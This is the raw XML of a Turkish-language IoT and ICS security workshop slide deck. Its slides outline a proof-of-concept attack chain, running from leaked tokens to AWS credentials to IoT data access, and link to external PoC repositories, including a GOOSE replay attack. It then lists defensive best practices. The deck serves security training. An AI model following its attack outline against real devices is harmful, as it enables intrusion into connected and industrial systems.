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Roboto"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
      <p:italic r:id="rId64"/>
      <p:boldItalic r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
      <p:italic r:id="rId68"/>
      <p:boldItalic r:id="rId69"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nunito Sans"/>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6439883-8009-4310-B882-0444342ABA4B}">
  <a:tblStyle styleId="{16439883-8009-4310-B882-0444342ABA4B}"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Sans-boldItalic.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoSans-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NunitoSans-bold.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/NunitoSans-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oboto-italic.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-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ono-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7.png>
</file>

<file path=ppt/media/image28.png>
</file>

<file path=ppt/media/image29.png>
</file>

<file path=ppt/media/image3.png>
</file>

<file path=ppt/media/image30.png>
</file>

<file path=ppt/media/image34.png>
</file>

<file path=ppt/media/image36.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 name="Google Shape;62;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63" name="Google Shape;63;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7" name="Google Shape;87;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88" name="Google Shape;88;p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7" name="Google Shape;10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7" name="Google Shape;397;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1" name="Google Shape;411;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8" name="Google Shape;418;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5" name="Google Shape;425;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7" name="Google Shape;447;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50:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286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5" name="Google Shape;455;p5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1" name="Google Shape;461;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3" name="Google Shape;473;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9" name="Google Shape;479;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p5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5" name="Google Shape;485;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1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1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8" name="Google Shape;48;p1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9" name="Google Shape;49;p1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0" name="Google Shape;50;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 name="Shape 51"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p1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3" name="Google Shape;53;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 name="Shape 54"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p1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6" name="Google Shape;56;p1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7" name="Google Shape;57;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enerated Slide 1_1_1_D">
  <p:cSld name="TITLE_AND_BODY_2_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="13" name="Shape 13"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;14;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="804675"/>
            <a:ext cx="3730200" cy="795600"/>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 type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1901954"/>
            <a:ext cx="3730200" cy="2697600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">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3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233672" y="228600"/>
            <a:ext cx="4690800" cy="4690800"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p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enerated Slide 1_1_1_G">
  <p:cSld name="TITLE_AND_BODY_2_1_1_1_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="18" name="Shape 18"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;19;p4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233672" y="228600"/>
            <a:ext cx="4690800" cy="4690800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;20;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="228600"/>
            <a:ext cx="3557100" cy="841200"/>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 name="Google Shape;21;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="3557100" cy="3319200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">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2" name="Google Shape;22;p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5" name="Google Shape;25;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9" name="Google Shape;29;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 name="Google Shape;32;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 name="Google Shape;37;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1" name="Google Shape;41;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1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4" name="Google Shape;44;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4.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theme" Target="../theme/theme2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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12.png"/><Relationship Id="rId6"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www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.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www.enisa.europa.eu/publications/enisa-threat-landscap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github.com/FerdiGul/POC/tree/main/IoT-HomeDevice"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cwe.mitre.org/data/definitions/287.html" TargetMode="Externa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5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId7"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11.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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4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19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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2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2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2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3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hyperlink" Target="https://my.pcloud.com//#page=filemanager&amp;folder=17164076440" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infotech.pl/products/downloads/trials-for-iec-61850" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/FerdiGul/Goose_Replay_Attack/tree/main"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3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4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4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45.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4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4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4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48.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46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId8"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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk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6" name="Google Shape;66;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295251" y="4419599"/>
            <a:ext cx="2629800" cy="499500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 Mayıs 2025</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="3065730" cy="5143500"/>
            <a:chOff x="1" y="0"/>
            <a:chExt cx="4087640" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="68" name="Google Shape;68;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1" y="0"/>
              <a:ext cx="3986041" cy="6858000"/>
              <a:chOff x="1" y="0"/>
              <a:chExt cx="3986041" cy="6858000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="69" name="Google Shape;69;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1" y="0"/>
                <a:ext cx="3986041" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="3986041">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066495" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3427241" y="1211943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3986041" y="4122057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3751724" y="6858000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6858000"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="dk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0" name="Google Shape;70;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1" y="0"/>
                <a:ext cx="3986041" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="3986041">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066495" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3427241" y="1211943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3986041" y="4122057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3751724" y="6858000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6858000"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="lt1">
                  <a:alpha val="13725"/>
                </a:scheme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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="71" name="Google Shape;71;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2748588" y="0"/>
              <a:ext cx="1339053" cy="6858000"/>
              <a:chOff x="2748588" y="0"/>
              <a:chExt cx="1339053" cy="6858000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="72" name="Google Shape;72;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2748588" y="0"/>
                <a:ext cx="1339053" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="1339053">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3" name="Google Shape;73;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2748588" y="0"/>
                <a:ext cx="1339053" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="1339053">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rotWithShape="1">
                <a:blip r:embed="rId3">
                  <a:alphaModFix amt="57000"/>
                </a:blip>
                <a:tile algn="tl" flip="none" tx="0" sx="100000" ty="0" sy="100000"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="6078270" y="0"/>
            <a:ext cx="3065730" cy="5143500"/>
            <a:chOff x="1" y="0"/>
            <a:chExt cx="4087640" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="75" name="Google Shape;75;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1" y="0"/>
              <a:ext cx="3986041" cy="6858000"/>
              <a:chOff x="1" y="0"/>
              <a:chExt cx="3986041" cy="6858000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Google Shape;76;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1" y="0"/>
                <a:ext cx="3986041" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="3986041">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066495" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3427241" y="1211943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3986041" y="4122057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3751724" y="6858000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6858000"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="dk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77" name="Google Shape;77;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1" y="0"/>
                <a:ext cx="3986041" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="3986041">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066495" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3427241" y="1211943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3986041" y="4122057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3751724" y="6858000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6858000"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="lt1">
                  <a:alpha val="13725"/>
                </a:scheme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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="78" name="Google Shape;78;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2748588" y="0"/>
              <a:ext cx="1339053" cy="6858000"/>
              <a:chOff x="2748588" y="0"/>
              <a:chExt cx="1339053" cy="6858000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="79" name="Google Shape;79;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2748588" y="0"/>
                <a:ext cx="1339053" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="1339053">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80" name="Google Shape;80;p15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2748588" y="0"/>
                <a:ext cx="1339053" cy="6858000"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6858000" w="1339053">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rotWithShape="1">
                <a:blip r:embed="rId3">
                  <a:alphaModFix amt="57000"/>
                </a:blip>
                <a:tile algn="tl" flip="none" tx="0" sx="100000" ty="0" sy="100000"/>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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Google Shape;81;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7128334" y="1208461"/>
            <a:ext cx="1486495" cy="1488000"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1860000" w="2619375">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2619375" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619375" y="1860000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1860000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2434188" y="1093075"/>
            <a:ext cx="4299600" cy="2289900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buFont typeface="Nunito Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT &amp; ICS </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buFont typeface="Nunito Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Workshop</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buFont typeface="Nunito Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Google Shape;83;p15" title="KOÜ Teknopark.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23517" l="0" r="0" t="21980"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7082550" y="3075000"/>
            <a:ext cx="1578050" cy="860074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Google Shape;84;p15" title="Cyberus.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="207725" y="2141713"/>
            <a:ext cx="1877730" cy="8600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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173250" y="617050"/>
            <a:ext cx="8797500" cy="1546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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🧪 4. Gerçek Bir Zafiyet Senaryosu (PoC Demo)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="17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Refresh Token → AWS Credential → IoT Data Access</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Mobil uygulama → şifreli olmayan trafik → API token sızıntısı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Bu bölümde </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>hazırladığın PoC kodunu</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> göster ve adım adım anlat</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120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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p2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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286675" y="379175"/>
            <a:ext cx="8025300" cy="1977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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>✅ 6. Güvenlik Önlemleri ve En İyi Pratikler</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="17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Token bazlı erişim + Expire mekanizmaları (JWT → kısa ömürlü)</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TLS 1.2+ kullanımı, Mutual Auth (mTLS)</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Firmware signing &amp; encryption</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OTA güncellemelerinde kimlik doğrulama</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Mobil uygulamada root detection, obfuscation</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API rate limiting &amp; anomaly detection</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Logging + SIEM entegrasyonu</a:t>
            </a:r>
